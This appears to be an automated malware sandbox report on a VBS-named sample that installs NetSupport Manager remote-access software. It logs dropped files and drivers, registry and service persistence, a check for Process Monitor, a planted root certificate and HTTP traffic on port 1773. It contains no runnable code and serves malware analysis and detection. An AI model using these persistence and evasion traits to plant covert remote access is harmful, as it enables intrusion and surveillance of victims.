                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                                Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\Pyyidau.vbs.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE66A.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEA5C.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEAFB.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF917.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\IcoViewer.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIED48.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWVI.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIhtmlgen.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\injlib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\x64\gdihook5.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI37C0.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\WdfCoInstaller01005.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEC1A.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF149.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcictl.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcisys.sysJump to dropped file
                                Source: C:\Windows\Installer\MSI1387.tmpFile created: C:\Windows\SysWOW64\pcimsg.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEF23.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF10A.tmpJump to dropped file
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\System32\client32provider.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pciconn.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3771.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEACC.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nsmres.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nsmexec.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\nspscr.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIED87.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCICHEK.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc100.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE787.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEE85.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\AudioCapture.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\VolumeControlWXP.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEC59.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIHOOKS.DLLJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF1F8.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1DBA.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE708.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI23B6.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEC89.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\ucrtbase.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI23E6.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\libcrypto-1_1.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF238.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\PCIinv.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF1A9.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClientTB.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupport\NetSupport Manager\msvcr100.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEBEA.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF2D5.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3741.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIED08.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF985.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{CBB68368-7767-4CFF-B3E5-211488346702}\ARPPRODUCTICON.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2955.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF8D7.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEB3B.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE94E.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEEB5.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIECC9.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEE06.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE6B9.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIFCA3.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEE46.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE748.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE66A.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEA5C.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEAFB.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF917.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE9FC.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIED48.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF373.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF691.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEBAA.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEDC7.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEA9C.tmpJump to dropped file
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\System32\drivers\nskbfltr2.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE5EC.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF179.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI37C0.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF0BB.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE9CD.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF314.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEC1A.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF149.tmpJump to dropped file
                                Source: C:\Windows\Installer\MSI1387.tmpFile created: C:\Windows\SysWOW64\pcimsg.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEF23.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF10A.tmpJump to dropped file
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\System32\client32provider.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEB6B.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3771.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEACC.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE98D.tmpJump to dropped file
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\winst64.exeFile created: C:\Windows\System32\drivers\nskbfltr.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF710.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIED87.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE787.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEA2C.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEE85.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEC59.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF869.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF1F8.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1DBA.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE708.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI23B6.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIEC89.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI23E6.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF238.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF1A9.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1387.tmpJump to dropped file
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005DDDD0 SetUnhandledExceptionFilter,GetModuleFileNameW,GetModuleFileNameW,GetLastError,GetUserNameW,LoadStringW,wsprintfW,GetPrivateProfileStringW,lstrcmpiW,GetModuleFileNameW,GetLastError,25_2_005DDDD0
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_0091DDD0 SetUnhandledExceptionFilter,GetModuleFileNameW,GetModuleFileNameW,GetLastError,GetUserNameW,LoadStringW,wsprintfW,GetPrivateProfileStringW,lstrcmpiW,GetModuleFileNameW,GetLastError,27_2_0091DDD0
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FEDDD0 SetUnhandledExceptionFilter,GetModuleFileNameW,GetModuleFileNameW,GetLastError,GetUserNameW,LoadStringW,wsprintfW,GetPrivateProfileStringW,lstrcmpiW,GetModuleFileNameW,GetLastError,GetCurrentDirectoryW,PostMessageW,KiUserCallbackDispatcher,Sleep,29_2_00FEDDD0
                                Source: C:\Windows\Installer\MSI1387.tmpFile created: C:\Windows\setupact.log

                                Boot Survival

                                barindex
                                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Windows\Installer\MSI1387.tmpRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PCIsys
                                Source: C:\Windows\Installer\MSI1387.tmpRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\HyperVideo
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005D9630 OpenSCManagerW,GetLastError,GetLastError,OpenServiceW,GetLastError,QueryServiceStatus,QueryServiceStatus,GetSystemDirectoryW,CreateProcessW,WaitForSingleObject,CloseHandle,CloseHandle,CloseHandle,QueryServiceStatus,ControlService,QueryServiceStatus,Sleep,QueryServiceStatus,GetLastError,Sleep,QueryServiceStatus,Sleep,QueryServiceStatus,StartServiceW,QueryServiceStatus,Sleep,QueryServiceStatus,RegisterEventSourceW,GetComputerNameW,wsprintfW,ReportEventW,DeregisterEventSource,GetLastError,CloseServiceHandle,CloseServiceHandle,Sleep,GetSystemDirectoryW,25_2_005D9630

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Uses known network protocols on non-standard ports
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49748
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49750
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49751
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49752
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49753
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49754
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49755
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49756
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49757
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49758
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49759
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49760
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49761
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49762
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49763
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49764
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49765
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49766
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49767
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49768
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49769
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49770
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005D44C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,SetWindowPos,25_2_005D44C0
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005D44C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,SetWindowPos,25_2_005D44C0
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_009144C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,SetWindowPos,27_2_009144C0
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: 27_2_009144C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,SetWindowPos,27_2_009144C0
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FE44C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,SetWindowPos,29_2_00FE44C0
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FE44C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,SetWindowPos,29_2_00FE44C0
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005C4760 GetModuleFileNameW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,25_2_005C4760
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeRegistry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
                                Source: C:\Windows\System32\msiexec.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 BlobJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
